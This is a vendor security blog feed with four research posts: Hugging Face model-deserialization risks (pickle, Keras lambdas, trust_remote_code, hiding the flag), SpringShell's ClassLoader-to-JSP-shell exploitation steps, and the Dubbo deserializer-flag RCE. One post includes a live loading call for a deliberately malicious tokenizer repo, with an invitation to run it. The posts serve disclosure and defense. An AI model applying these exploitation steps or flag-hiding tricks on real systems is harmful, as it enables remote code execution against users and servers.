Dor Tumarkin, Author at Checkmarx https://checkmarx.com/author/dortumarkin/ The world runs on code. We secure it. Thu, 21 Nov 2024 17:36:10 +0000
“Free Hugs” – What to be Wary of in Hugging Face – Part 2 https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-part-2/ Thu, 21 Nov 2024 12:00:48 +0000
Enjoy Threat Modeling? Try Threats in Models! 


Previously… 
In part 1 of this 4-part blog, we discussed Hugging Face, the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, and how users who trust the ReadMe can be exploited, and provided a glimpse into methods of attacking users via malicious models. 
In part 2, we explore dangerous model protocols in more depth, going into the technical reasons why exactly models are running code. 

Angry pickle


Introduction to Model Serialization  

A model is a program that was trained on vast datasets to either recognize or generate content based on statistical conclusions derived from those datasets.  
To oversimplify, they’re just data results of statistics. However, do not be misled – models are code, not plain data. This is often stressed in everything ML, particularly in the context of security. Without going into too much detail – it is inherent for many models to require logic and functionality which is custom or specific, rather than just statistical data.  
Historically (and unfortunately) that requirement for writable and transmittable logic encouraged ML developers to use complex object serialization as a means of model storage – in this case types of serialization which could pack code. The quickest solution to this problem is the notoriously dangerous pickle, used by PyTorch to store entire Torch objects, or its more contextual and less volatile cousin marshal, used by TensorFlow’s lambda layer to store lambda code. 

Pickle code snippet

Please stop using this protocol for things. Please. 

While simple serialization involves data (numbers, strings, bytes, structs), more complex serialization can contain objects, functions and even code – and that significantly raises the risk of something malicious lurking inside the models.
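As a minimal sketch of why "objects, functions and even code" matter here, the snippet below uses only the standard library. The class name NotJustData and the harmless sum payload are illustrative assumptions; an attacker would substitute something like os.system and a shell command.

```python
import pickle


class NotJustData:
    """Hypothetical class that tells pickle how to 'rebuild' it on load."""

    def __reduce__(self):
        # pickle records "call sum([40, 2])" in the byte stream.
        # A malicious model would record os.system("...") instead.
        return (sum, ([40, 2],))


blob = pickle.dumps(NotJustData())

# The class is deleted to show the loader does not need its source:
# the callable and its arguments travel inside the pickle itself.
del NotJustData

# The recorded call executes during loads(); the "object" we get back
# is simply whatever that call returned.
result = pickle.loads(blob)
print(result)
```

The point of the sketch is that the call happens inside pickle.loads, before the caller has any chance to inspect what was loaded.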

Browser warning on Pickle module

Writing’s on the wall there, guys

Protecting these dangerous deserializers while still using them is quite a task. For now, let’s focus on exploitation. This is quite well documented at this point, though there have been some curious downgrades exposed during this research. 

Exploiting PyTorch 

PyTorch is a popular machine learning library – extremely popular on Hugging Face and the backbone of many ML frameworks supported on HF. We’ll have more on those (and how to exploit them) in a future blog. 
PyTorch relies on pickling to save its output, and a pickle can contain an arbitrary method with arbitrary variables that is invoked upon deserialization with the load function; torch.load behaves the same way: 

Import torch command code snippet

If this looks identical to the previous Pickle example to you then that’s because it is. 

Note that the source code for BadTorch doesn’t need to be in scope – the value of __reduce__ is packed into the pickle, and its contents will execute on any pickle.load action. 
To combat this, PyTorch added a weights_only flag. This flag treats anything outside of a very small allowlist as malicious and rejects it, severely limiting if not blocking exploitation. It is used internally by Hugging Face’s transformers, which explains why it can safely load torches even when they are dangerous. Starting with version 2.4, this flag is encouraged via a warning stating that it will become the default behavior in the future. 

Hugging Face transformers warning text

At the time of writing, PyTorch does not yet enable weights_only mode by default. Seeing how rampant the use of torch.load is in various technologies (this will be discussed in part 3), it would be safer to believe this change when we see it, because it is likely to be a breaking change. It would then be up to the maintainers whose code this change breaks to either adapt to it or disable this security feature. 
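The allowlist idea behind weights_only can be sketched with the standard library's pickle.Unpickler.find_class hook. This is not PyTorch's implementation: the ALLOWED set, AllowlistUnpickler and safe_loads are hypothetical names, and PyTorch's real allowlist is different and longer.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist of (module, name) pairs the stream may reference.
ALLOWED = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream references a global (class or function).
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def safe_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


class Payload:
    def __reduce__(self):
        return (sum, ([40, 2],))  # harmless stand-in for os.system(...)


# Plain containers of numbers load fine...
weights = safe_loads(pickle.dumps(OrderedDict(layer=[0.1, 0.2])))

# ...while a stream that references any other callable is rejected
# before that callable is ever invoked.
try:
    safe_loads(pickle.dumps(Payload()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

The design choice worth noting is that the check happens when the global is resolved, which is earlier than the call itself, so a rejected payload never runs.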

TensorFlow to Code Execution 

TensorFlow is a different machine learning library that also offers various ways to serialize objects. 
Of particular interest to us are serialized TensorFlow objects in protocols that may contain serialized lambda code. Since lambdas are code, they get executed after being unmarshaled by Keras, a high-level interface library for TensorFlow.
Newer versions of TensorFlow do not generate files in the older Keras formats (TF1, which uses several protobuf files, or h5). 
To observe this, we can look at the older TensorFlow 2.15.0, which still allows generating a model that executes malicious code when loaded (credit to Splinter0 for this particular exploit): 

Import tensorflow command code snippet
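The general mechanism behind a serialized lambda, storing a function's compiled code with marshal and rebuilding it on load, can be sketched with the standard library alone. This is a simplified illustration under that assumption, not Keras's actual Lambda layer code, and the lambda here is deliberately harmless.

```python
import marshal
import types

# "Saving": only the compiled bytecode of the lambda is stored, as bytes.
double = lambda x: x * 2
stored = marshal.dumps(double.__code__)

# "Loading": the bytes become a code object again and are wrapped in a
# function. Whatever that bytecode does will run as soon as it is called,
# for example when a layer is evaluated.
code = marshal.loads(stored)
restored = types.FunctionType(code, {})

print(restored(21))
```

Nothing in the loading half inspects what the bytecode does, which is why a lambda stored in a model file is code execution waiting for a caller.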

Note that the functionality to serialize lambdas has been removed in later versions of the protocol. Keras, which supports lambdas, now relies on annotations to link lambdas to your own code, removing arbitrary code from the process. 
This could have been a great change if it eliminated support for the old dangerous formats, but it does not – it only removes serialization (which creates the payload) but not execution after deserialization (which consumes it). 
Simply put – just see for yourself: if you generate a payload like the above model in an h5 format using the dangerous tensorflow 2.15.0, and then update your tensorflow: 

Import tensorflow command code snippet

Exploit created on tensorflow 2.15.0, exploit pops like a champ on 2.18.0

In other words – this is still exploitable. It’s not really a Keras vulnerability (in the same vein, torch.load “isn’t vulnerable”), but rather a matter of how you end up using it – we disclosed it, amongst several other things, to Hugging Face in August 2024, but more on that in a later write-up.

SafeTensors

Currently, Hugging Face is transferring models from a pickle format to SafeTensors, which use a more secure deserialization protocol that is not as naïve (but not as robust) as pickles.

SafeTensors simply use a completely different language (Rust) and a much simpler serialization protocol (Serde), which requires customization for any sort of automatic behavior post-deserialization.
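To make "a much simpler serialization protocol" concrete, here is a rough sketch of the published safetensors file layout: an 8-byte little-endian header length, a JSON header, then raw tensor bytes. The helper names build_file and parse_file are hypothetical, and the real library performs validation that this sketch skips.

```python
import json
import struct


def build_file(tensors: dict) -> bytes:
    """Pack {name: (dtype, shape, raw_bytes)} into a safetensors-style blob."""
    header, body = {}, b""
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {
            "dtype": dtype,
            "shape": shape,
            "data_offsets": [len(body), len(body) + len(raw)],
        }
        body += raw
    header_bytes = json.dumps(header).encode("utf-8")
    # 8-byte little-endian header length, JSON header, then raw tensor bytes.
    return struct.pack("<Q", len(header_bytes)) + header_bytes + body


def parse_file(blob: bytes) -> dict:
    """Return {name: (dtype, shape, raw_bytes)} using only JSON and slicing."""
    (header_len,) = struct.unpack("<Q", blob[:8])
    header = json.loads(blob[8 : 8 + header_len])
    body = blob[8 + header_len :]
    out = {}
    for name, info in header.items():
        if name == "__metadata__":  # optional free-form string map
            continue
        start, end = info["data_offsets"]
        out[name] = (info["dtype"], info["shape"], body[start:end])
    return out


raw = struct.pack("<2f", 1.0, 2.0)  # two float32 values
blob = build_file({"w": ("F32", [2], raw)})
parsed = parse_file(blob)
```

Loading amounts to parsing JSON and slicing bytes; there is no step at which the file gets to name a function to call.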

Moving from Torch to SafeTensors

However, there is a fly in the SafeTensors ointment – importing. It makes sense that the only way to import from another format is to open it using legacy libraries, but it’s also another vulnerable way to invoke Torches. convert.py is a part of the SafeTensors library intended to convert torches to the SafeTensors format; however, the conversion itself is simply a wrapper for torch.load:
https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py#L186
The HF Devs are aware of this and have added a prompt – but that can be bypassed with a -y flag:

python convert code result

Model will run whoami on conversion. Disclaimer: image manipulated to exclude a bunch of passive warnings that might warn you, right after it’s way too late

The problem here is the very low trust barrier to cross – since, as discussed, most configuration is derived from ReadMe commands. This flag can simply be hidden between other values in instructions, which makes convert.py not just a conversion tool but also another vector to look out for.

There are many more conversion scripts in the transformers library that still contain dangerous calls to torch.load; they can be found on the Transformers GitHub.

Conclusion

It’s interesting to see how what’s old is new again. Old serialization protocols, which are easier to implement and use, are making a comeback through new, complex technology – particularly where security was never a concern during experimentation – and are again becoming deeply ingrained in relatively new technology. The price for that speed is still being paid, with the entire ecosystem struggling to pivot to a secure and viable service by slogging through this tech debt.

There are several recommendations to be made when judging models by their format:

  • With serialization mechanisms baked into the ecosystem, you should avoid the legacy ones, and review those that are middle-of-the-way and historically vulnerable.
  • Consider a transition to SafeTensors or other protocols that are identified as secure and do not execute code or functions on deserialization, and reject older, potentially dangerous protocols.
    • BUT never trust conversion tools to safely defuse suspicious models (without reviewing them first).
  • And – as always – make sure you trust the maintainer of the Model.

On The Next Episode…  

Now that we’ve discussed a couple of vulnerable protocols, we’ll demonstrate how they can be exploited in practice against Hugging Face integrated libraries. 

“Free Hugs” – What To Be Wary of in Hugging Face – Part 1 https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-part-1/ Thu, 14 Nov 2024 12:00:00 +0000

Introduction 

GenAI has taken the world by storm. Various vendors have risen to meet the need to develop and spread LLM/GenAI technology through open source. 

One well-known platform is Hugging Face – an open-source platform that hosts GenAI models. It is not unlike GitHub in many ways – it’s used for serving content (such as models, datasets and code), version control, issue tracking, discussions and more. It also allows running GenAI-driven apps in online sandboxes. It’s very comprehensive and at this point a mature platform chock full of GenAI content, from text to media. 

In this series of blog posts, we will explore the various potential risks present in the Hugging Face ecosystem. 

Championing logo design Don’ts (sorry not sorry opinions my own) 

Hugging Face Toolbox and Its Risks 

Beyond hosting models and associated code, Hugging Face is also a maintainer of multiple libraries for interfacing with all this goodness – libraries for uploading, downloading and executing models on the Hugging Face platform. From a security standpoint – this offers a HUGE attack surface to spread malicious content through. A lot has already been said about that vast attack surface, and many things have been tested in the Hugging Face ecosystem, but many legacy vulnerabilities persist, and bad security practices still reign supreme in code and documentation; these can bring an organization to its knees (while being practiced by major vendors!), and known issues are shrugged off because “that’s just the way it is” – while new solutions suffer from their own set of problems. 

ReadMe.md? More Like “TrustMe.md” 

The crux of all potentially dangerous behavior around marketplaces and repositories is trust – trusting the content’s host, trusting the content’s maintainer and trusting that no one is going to pwn either. This is also why environments that allow obscuring malicious code or ways to execute it are often more precarious for defenders. 

While downloading things from Hugging Face is trivial, actually using them is finicky – there is no one global definitive way to do so, and trying to do it any other way than the one recommended by the vendor will likely end in failure. Figuring out how to use a model always boils down to RTFM – the ReadMe. 

But can ReadMe files be trusted? Like all code, there are good and bad practices – even major vendors fall for that. For example, Apple actively uses dangerous flags when instructing users on loading their models: 

trust_remote_code sounds like a very reasonable flag to set to True 

There are many ways to dangerously introduce code into the process, simply because users are bound to trust what the ReadMe presents to them. They can load malicious code or malicious models in a manner that is both dangerous and very obscure. 

Configuration-Based Code Execution Vectors 

Let’s start by examining the above configuration in its natural habitat.

Transformers is one of the many tools Hugging Face provides users with, and its purpose is to normalize the process of loading models, tokenizers and more with the likes of AutoModel and AutoTokenizer. It wraps around many of the aforementioned technologies and mostly does a good job of only utilizing secure calls and flags. 

However – all of that security goes out the window once code execution is enabled for custom models, which load as Python code behind a flag, “trust_remote_code=True”. This flag allows loading classes for models and tokenizers which require additional code and a custom implementation to run. 

While it sounds like a terrible practice that should be rarely used, this flag is commonly set to True. Apple was already mentioned, so here’s a Microsoft example: 

Why wouldn’t you trust remote code from Microsoft? What are they going to do, force install Windows 11 on y- uh oh it’s installing Windows 11 

Using these configurations with an unsecure model could lead to unfortunate results. 

Code loads dangerous config → config loads code module → code loads OS command 

  • Code will attempt to load an AutoModel from a config with the trust_remote_code flag 
  • Config will then attempt to load a custom class model from “exploit.SomeTokenizer” which will import “exploit” first, and then look for “SomeTokenizer” in that module 
  • SomeTokenizer class doesn’t exist but exploit.py has already been loaded, and executing malicious commands 
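The three steps above can be sketched without transformers at all. The load_class helper below is a hypothetical stand-in for any loader that resolves a "module.ClassName" reference; the temporary exploit.py only writes a marker file where a real one would run an OS command.

```python
import importlib
import pathlib
import sys
import tempfile

# A stand-in for a downloaded model repo containing "exploit.py".
repo = pathlib.Path(tempfile.mkdtemp())
(repo / "exploit.py").write_text(
    "import pathlib\n"
    "# Top-level code: runs on import. Harmless stand-in for an OS command.\n"
    "pathlib.Path(__file__).with_name('ran.txt').write_text('executed')\n"
)
sys.path.insert(0, str(repo))


def load_class(reference: str):
    """Resolve 'module.ClassName' the way a dynamic loader typically does."""
    module_name, class_name = reference.rsplit(".", 1)
    module = importlib.import_module(module_name)  # top-level code runs here
    return getattr(module, class_name)  # the class is only looked up afterwards


try:
    load_class("exploit.SomeTokenizer")
    found = True
except AttributeError:
    found = False

ran = (repo / "ran.txt").exists()
print(f"class found: {found}, module code executed: {ran}")
```

The lookup fails, yet the module's top-level code has already executed, which matches the last bullet: the class never needs to exist.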

This works for auto-models and auto-tokenizers, and in transformer pipelines: 

in this case the model is valid, but the tokenizer is evil. Even easier to hide behind! 

Essentially this paves the way to malicious configurations – ones that seem secure but aren’t. There are plenty of ways to hide a True flag looking like a False flag in plain sight: 

  • False is False 
  • {False} is truthy – it’s a non-empty set 
  • “False” is truthy – it’s a non-empty str 
  • False < 1 – is True, just squeeze it to the side: 

This flag is set as trust_remote_code=False……………………………………………………………………………….………….n’t 
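A quick way to check how such values behave is to pass them through bool(), which is what an `if flag:` test effectively applies. Whether a given library treats them as enabled depends on how it checks the flag (truthiness versus `is True`), so this is a sketch of the Python semantics only.

```python
candidates = {
    "False": False,
    "{False}": {False},      # a set with one element
    '"False"': "False",      # a non-empty string
    "False < 1": False < 1,  # a comparison that evaluates to True
}

for label, value in candidates.items():
    # bool() mirrors what a plain `if flag:` check would decide.
    print(f"{label:10} -> {bool(value)}")

truthy = [label for label, value in candidates.items() if value]
```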

While these are general parlor tricks to hide True statements that are absolutely not exclusive to any of the code we’ve discussed – hiding a dangerous flag in plain sight is still rather simple. However, the terrible practice by major vendors to have this flag be popular and expected means such trickery might not even be required – it can just be set to True. 

Of course, this entire thing can be hosted on Hugging Face – models are uploaded to repos in profiles. Providing the name of the profile and repo will automatically download and unpack the model, only to load arbitrary code. 

import transformers 

yit = transformers.AutoTokenizer.from_pretrained("dortucx/unkindtokenizer", trust_remote_code=True)

print(yit) 

Go on, try it. You know you want to. What’s the worst that can happen? Probably nothing. Right? Nothing whatsoever. 

Dangerous Coding Practices in ReadMes 

Copy-pasting from ReadMes isn’t just dangerous because they contain configurations in their code, though – ReadMes contain actual code snippets (or whole scripts) to download and run models. 

We will discuss many examples of malicious model loading code in subsequent write-ups but to illustrate the point let’s examine the huggingface_hub library, a Hugging Face client. The hub has various methods for loading models automatically from the online hub, such as “huggingface_hub.from_pretrained_keras”. Google uses it in some of its models: 

And if it’s good enough for Google, it’s good enough for everybody! 

But this exact method also supports dangerous legacy protocols that can execute arbitrary code. For example, here’s a model that is loaded using the exact same method using the huggingface_hub client and running a whoami command: 

A TensorFlow model executing a “whoami” command, as one expects! 

Conclusions 

The Hugging Face ecosystem, like all marketplaces and open-source providers, suffers from issues of trust, and like many of its peers – has a variety of blindspots, weaknesses and practices that empower attackers to easily obscure malicious activity. 

There are plenty of things to be aware of – for example if you see the trust_remote_code flag being set to True – tread carefully. Validate the code referenced by the auto configuration.  

Another always-true recommendation is to simply avoid untrusted vendors and models. A model configured incorrectly by a trusted vendor is only trustworthy until that vendor’s account is compromised, but any model from any untrusted vendor is always highly suspect. 

As a broader but more thorough methodology, however, a user who wants to securely rely on Hugging Face as a provider should be aware of many things – hidden evals, unsafe model loading frameworks, hidden importers, fishy configuration and many, many more.  It’s why one should read the rest of these write-ups on the matter. 

On The Next Episode… 

Now that we’ve discussed the very basics of setting up a model – we’ve got exploit deep-dives, we’ve got scanner bypasses, and we’ve also got more exploits. Stay tuned. 

SpringShell – Remote Code Execution via Spring Web https://checkmarx.com/blog/springshell-remote-code-execution-via-spring-web/ Thu, 31 Mar 2022 12:04:03 +0000

SpringShell is a new vulnerability in Spring, the world’s most popular Java framework, which enables remote code execution (RCE) using ClassLoader access to manipulate attributes and setters. This issue was unfortunately leaked online without responsible disclosure before an official patch was available. This vulnerability has been assigned CVE-2022-22965.

At present, known exploitation of this vulnerability requires a combination of Spring, Java version 9 and up, and Tomcat; however, this is likely to change, due to the fact this exposure occurs in Spring and allows access to various sensitive components. It is therefore safest to assume all Spring Web instances are likely to be vulnerable.

Note that currently there is another critical RCE vulnerability making headlines around Spring Cloud, which involves a similar exploitation technique of accessing functions. This article does not cover that issue.

Technology Breakdown

The current focus at large is on the known exploitation of Spring, Java version 9 and up, and Tomcat.

Spring allows rapid and lightweight development for Java applications, particularly for web applications. Tomcat is a very popular webserver for Java applications, and is also embedded into Spring Boot. This means the combination of Spring and Tomcat is almost ubiquitous, making this vulnerability extremely common. Java 9 has been around for 5 years and is also a requirement for this issue.

Another requirement for the specific exploit is accepting POST requests with POJOs to trigger binding; there are very few Spring web-applications that do not.

Am I Vulnerable?

If you are using Spring Web which is exposed to the internet running on Java 9 and later – you are most likely exposed to this vulnerability. Current exploits available in the wild require a combination of Spring and Tomcat, but Tomcat is merely an instrument in a gadget used to trigger this RCE; more gadgets may be found as exposed by this vulnerability.

How Does It Work?

The best way to explain how this vulnerability is exploitable is by breaking down the available exploit. However – note that while this exploit affects a particular configuration of Spring, Tomcat, and Java – not having this particular configuration does not imply you are safe from exploitation, only from this particular variant.

The current RCE PoC exploit involves the following steps:

  • Finding a POST endpoint in the Spring application
  • Submitting a request to reconfigure Tomcat to output a log to an arbitrary JSP file in an accessible location which serves JSP files on the Tomcat server
  • Triggering a write to this log of user-provided values, to create a JSP file with malicious code
  • Execute the JSP file by requesting it via HTTP, as per standard JSP behavior

Let’s break it down.

ClassLoader Manipulation

It is possible to access ClassLoader variables via POST parameters prefixed by class.module.classLoader.* in Spring, due to parameter binding. Years ago, Spring allowed access to ClassLoader directly in this manner, which led to other exploits (e.g., CVE-2010-1622). A deny-list for specific parameters was then added as mitigation. However, Java 9 added Modules, which allow reaching ClassLoader via class.getModule().getClassLoader(); this is precisely why the deny-list approach could be bypassed by class.module.classLoader.

This manipulation exposes internal objects to user-provided values, and is the core of this vulnerability.
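The bypass can be illustrated with a toy model of property traversal. The PROPERTIES graph, the DENIED set and the resolve function below are all simplifying assumptions made for illustration; they are not Spring's actual binding code.

```python
# Toy property graph: type -> {property name: type of the value}.
PROPERTIES = {
    "Bean": {"class": "Class"},
    "Class": {"classLoader": "ClassLoader", "module": "Module"},
    "Module": {"classLoader": "ClassLoader"},  # path that exists since Java 9
    "ClassLoader": {},
}

# Deny-list in the spirit of the old mitigation: block by (type, property).
DENIED = {("Class", "classLoader")}


def resolve(path: str) -> str:
    """Walk a dotted parameter name and return the type it finally reaches."""
    current = "Bean"
    for prop in path.split("."):
        if (current, prop) in DENIED:
            raise PermissionError(f"{current}.{prop} is denied")
        current = PROPERTIES[current][prop]
    return current


try:
    resolve("class.classLoader")
    direct_blocked = False
except PermissionError:
    direct_blocked = True

# The same target is still reachable through the newer Module hop.
via_module = resolve("class.module.classLoader")
print(direct_blocked, via_module)
```

A deny-list only covers the paths that existed when it was written; once a new edge appears in the graph, the denied node is reachable again.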

Tomcat Context Reconfiguration

Using this ClassLoader manipulation on a Tomcat web server, it is possible for attackers to directly access the Tomcat context, which in itself contains Tomcat configurations.

In this exploit, Tomcat is reconfigured to write logs to a new file on an attacker’s behest. This file, instead of just being a log file, will also double as an executable JSP file.

The following attributes are edited to write the arbitrary log file:

  • class.module.classLoader.resources.context.parent.pipeline.first.directory — the path to which the log file is written. In standard Tomcat dev environments, webapps/ROOT will expose a root folder for the webserver itself; however, in more custom prod environments an attacker may need to figure out where exactly malicious JSP files can be written to be remotely accessible
  • class.module.classLoader.resources.context.parent.pipeline.first.prefix — will determine the log file name
  • class.module.classLoader.resources.context.parent.pipeline.first.suffix — will determine the log file extension — for the purpose of exploitation this will be an executable servlet type such as JSP, but attackers can come up with various other potentially executable file types
  • class.module.classLoader.resources.context.parent.pipeline.first.pattern — this is the pattern that will be written to the log file; attackers will write malicious code instead of a pattern, such that on a logging event their malicious code will be written into the file
  • class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat — this is the date format, which is purposefully left blank to remove the noisy timestamps from the output of the exploit
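As a rough sketch, the five attributes above map onto an ordinary form-encoded request body. The prefix and suffix values are assumptions inferred from the /ohno.jsp path mentioned in this post, the pattern is an inert placeholder, and nothing is sent over the network.

```python
from urllib.parse import parse_qs, urlencode

PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."

params = {
    PREFIX + "directory": "webapps/ROOT",  # where the log file is written
    PREFIX + "prefix": "ohno",             # assumed log file name
    PREFIX + "suffix": ".jsp",             # assumed log file extension
    PREFIX + "pattern": "PLACEHOLDER",     # inert stand-in for the log pattern
    PREFIX + "fileDateFormat": "",         # blank, to drop timestamps
}

# This is just a regular application/x-www-form-urlencoded body.
body = urlencode(params)

# Round-trip to show the server side sees plain key/value parameters.
decoded = parse_qs(body, keep_blank_values=True)
print(len(decoded), "parameters")
```

For defenders, the useful observation is that such a request is unremarkable at the HTTP level; only the parameter names give it away.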

Arbitrary File Write of a Malicious JSP File

For example, the following POST request can be sent:

This will override the log configurations to create a JSP servlet at the Tomcat’s web application root (“/”), allowing attackers to execute the malicious code in “pattern” by simply browsing to /ohno.jsp

Mitigation & Conclusions

According to an update on the official Spring website, this issue is mitigated in Spring Framework versions 5.3.18 and 5.2.20. This article also contains a vendor-recommended workaround for those who cannot update at present.

From the looks of things and how analysis of this issue currently pans out — this vulnerability illustrates how the changes made to Java have incidentally made the Spring deny-list obsolete, in a way that has evaded detection for a significant amount of time. This highlights the ever-present issue of denying dangerous functionalities, rather than explicitly allowing safe ones, which is a behavior often prevalent in frameworks that offer a lot of dynamic and complex features.


Checkmarx SCA customers can scan their code for similar types of vulnerabilities and get the latest remediation guidance.

The 0xDABB of Doom: CVE-2021-25641 https://checkmarx.com/blog/the-0xdabb-of-doom-cve-2021-25641/ Fri, 04 Jun 2021 14:01:09 +0000

Introduction

When I previously wrote the original Dubbo publication, we disclosed that issue as it was mitigated by the vendor. While the Dubbo “HTTP” protocol in that disclosure was trivially vulnerable to the most common Java deserialization attacks (as evidenced by the immediate cropping up of exploits for Dubbo as soon as a very broad description of the issue was published in a mailing list) – the so-called “HTTP” was an elective protocol, and honestly – there was no apparent reason to choose it over the default Dubbo protocol. This made it an unlikely misconfiguration, and most devs would probably just stick to the default Dubbo protocol; this made it very tempting to investigate Dubbo further.
The “Dubbo” protocol is a proprietary binary protocol which required some reverse-engineering of its inner logic and how it is being consumed by the endpoint. It actually wraps around the binary of the serialized object, adding meta-data and additional objects to the stream. The underlying deserializer defaults to Hessian2, configured to exclude many of the “known dangerous” classes often used to exploit such attacks. However, there were some ways to manipulate this protocol, such as electing the deserializer, which would then lead to RCE.

Vulnerability Overview

The Dubbo protocol is a proprietary protocol developed for Apache Dubbo for transmission of objects between Dubbo services. Apache Dubbo providers and consumers using certain versions of Dubbo, when configured to accept the default “Dubbo” protocol, allow a remote attacker to send a malformed stream containing a malicious object to the exposed service, which would result in Remote Code Execution.

This RCE occurs with no authentication, and no knowledge on an attacker’s part is required to exploit this vulnerability – only an open port on a Provider server running Apache Dubbo. This issue applies to default configuration, where the built-in Dubbo protocol is used.

Severity

Checkmarx considers this vulnerability to have a CVSS score of 10.0 (Critical), as it is an unauthenticated remote code execution vulnerability which provides privileges at the Dubbo service’s permission level, allowing complete compromise of that service’s confidentiality, integrity, and availability.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

What’s Going On – Understanding the Dubbo Protocol

The server-side “Dubbo” protocol on a provider is used to expose a service, and methods within this service, to external consumers.
The “Dubbo” protocol has two general modes served over the same port:

  1. Telnet-like mode, where a CLI is available to allow invoking a method exposed by the provider service
  2. An RMI mode, where the TCP packet is then treated as a byte stream, which is deserialized to be used with the service offered by the Dubbo provider

Fig. 1 – Dubbo Telnet

While default behavior is Telnet-like, the way the remoting protocol is invoked is by providing a header which is built in the following manner:

  1. Two magic bytes – 0xdabb
  2. A flag byte – this flag determines:
    1. If this stream is a request or a response
    2. If this transaction is one-way or two-way
    3. Deserialization mechanism identifier (Hessian2, Kryo, Java etc.)
  3. Padding null-bytes, to allow for dynamic length
  4. Length of stream

This method is reminiscent of port-knocking, but instead of sending a stream of bytes to open a port, two preamble bytes are used to switch between protocols (Telnet-like mode and RMI-like mode).
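The header described above can be sketched as a small parser. The exact 16-byte layout and the bit masks below are assumptions based on the publicly available Dubbo wire format rather than on this post, which describes the bytes between the flag and the length simply as padding; the serialization id used in the sample is made up.

```python
import struct

MAGIC = 0xDABB
FLAG_REQUEST = 0x80        # assumed bit: request (set) vs response (clear)
FLAG_TWOWAY = 0x40         # assumed bit: two-way (set) vs one-way (clear)
SERIALIZATION_MASK = 0x1F  # assumed: low bits carry the deserializer id


def parse_header(header: bytes) -> dict:
    """Decode an assumed 16-byte header: magic, flag, status, id, length."""
    magic, flag, _status, _request_id, length = struct.unpack(">HBBQI", header[:16])
    if magic != MAGIC:
        # Without the two magic bytes, the Telnet-like mode would apply.
        raise ValueError("not a Dubbo remoting frame")
    return {
        "is_request": bool(flag & FLAG_REQUEST),
        "two_way": bool(flag & FLAG_TWOWAY),
        "serialization_id": flag & SERIALIZATION_MASK,
        "body_length": length,
    }


# Sample header: request, two-way, made-up serialization id 2, 5-byte body.
sample = struct.pack(">HBBQI", MAGIC, FLAG_REQUEST | FLAG_TWOWAY | 2, 0, 0, 5)
info = parse_header(sample)
print(info)
```

Note that the deserializer id sits in a byte fully controlled by whoever sends the frame.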
The preamble header is then followed by a stream sequence containing the following data:

  1. Dubbo Protocol version
  2. Service name (“Path”)
  3. Service version
  4. Method name
  5. Method argument types
  6. Method arguments
  7. Request attachments, which may contain additional data

All of the above data is read as a UTF string with the exception of 6 – method arguments; this is because a method argument may contain any Java object which may be passed to the Dubbo Provider, while other data is provided as Strings, to be used with reflections inside the code.
The open Dubbo port can be trivially fingerprinted as such by readily available tools, such as Nmap.

Fig. 2 – Dubbo telnetd Service, As It Appears on Nmap

The raw TCP request, including preamble and metadata, sends a request and receives a response over the same TCP stream, as demonstrated via Dubbo’s Quick Start sayHello demo:

Fig. 3 – Dubbo Protocol Request in Its Default Serialized Form

Fig. 4 – Dubbo Protocol Response in Dubbo Demo

Fig. 5 – Dubbo Protocol Breakdown

Attacking the Dubbo Protocol

The most commonly known Java-based gadget chains used for exploiting deserialization attacks rely on several key classes – these classes appear to be blacklisted on the default Hessian2 serializer.
The Dubbo protocol relies on the flags byte (3rd byte of the stream) to determine which serializer/deserializer to use when processing this stream. While the default is Hessian 2, an attacker may tamper with this flag to choose a different deserializer, exposing multiple additional options for serialization. These additional deserializers do not offer the same protection Hessian 2 does.
An attacker can modify the flag to choose either of the following protocols:

  • Kryo
  • FST

Both of these protocols are binary serialization protocols, and successfully deserialize the FastJSON gadget-chain.

Fig. 6 – The Majestic, Feral Beauty of a Kryo-Serialized FastJSON Gadget ByteStream

For the purpose of having the gadget chain deserialized, however, a compliant stream should be created containing the required preamble, headers, and metadata.
Since the exploit does not actually require Dubbo to successfully dispatch the request (in versions <= 2.7.5), but rather simply successfully read, parse and deserialize it, the stream itself can contain random or arbitrary strings. These strings are only there to serve as padding and satisfy multiple “readUTF” operations, until readObject is called on the stream, at which point FST or Kryo are the chosen deserializer and the exploit is triggered.

Recreating the Issue

An attacker can reimplement the Dubbo protocol with its byte preamble, header flags and content length, as well as dummy strings and a malicious object to satisfy the endpoint’s implementation for reading it.
The same gadget chain used in the previous exploit for the 2.7.3 HTTP protocol, which allows remote OS command execution, was found in the scope of vanilla Apache Dubbo, so long as dubbo-common is also in scope (more on this later).

Proof-of-Concept

Recreating a Victim Dubbo Instance for PoC

Either use the code sample from my previous research blog or follow this guide:

  1. Follow the Official Apache Dubbo Quick-Start guide until a functioning provider and registry are successfully created (see here for a full sample)
  2. Ensure dubbo-common, or a package where this dependency is not optional, is in scope

 Add the following dependencies to enable Spring Framework, Dubbo and Dubbo Common (presented in Maven pom.xml form for ease of use):

Triggering Vulnerability PoC

See this link for functioning POC code. The gadget chain being exploited here, which is native to Dubbo 2.7.3’s ecosystem, is clearly broken down in Part 1. The rest of this POC takes this gadget, and reimplements the Dubbo protocol to wrap it with the appropriate preamble, flags, and headers to exploit a vulnerable deserializer on a receiving Dubbo endpoint.

Fig. 7 – Deserialization Gadget Writes “whoops!” to Java Console, and Starts Calc.exe

Vulnerability Evolution

Between the disclosure of this issue and the CVE, this issue has evolved across several releases. For versions 2.7.5 and 2.7.6 – the vulnerable deserializers have been removed from the core packages into their own respective packages. This functionality is imported separately, in the form of the dubbo-serialization-kryo/fst packages. In 2.7.7, according to documentation, it is no longer possible to pass garbage values in the Dubbo stream – deserialization does not occur without a proper method and service name.

Conclusions

This exploit, following the previous PoC for exploiting the HTTP protocol in version 2.7.3, further illustrates the need for strict whitelisting combined with class resolution look-ahead within any remote invocation services that deal with serialized objects – not just for Dubbo, and not just for Java.
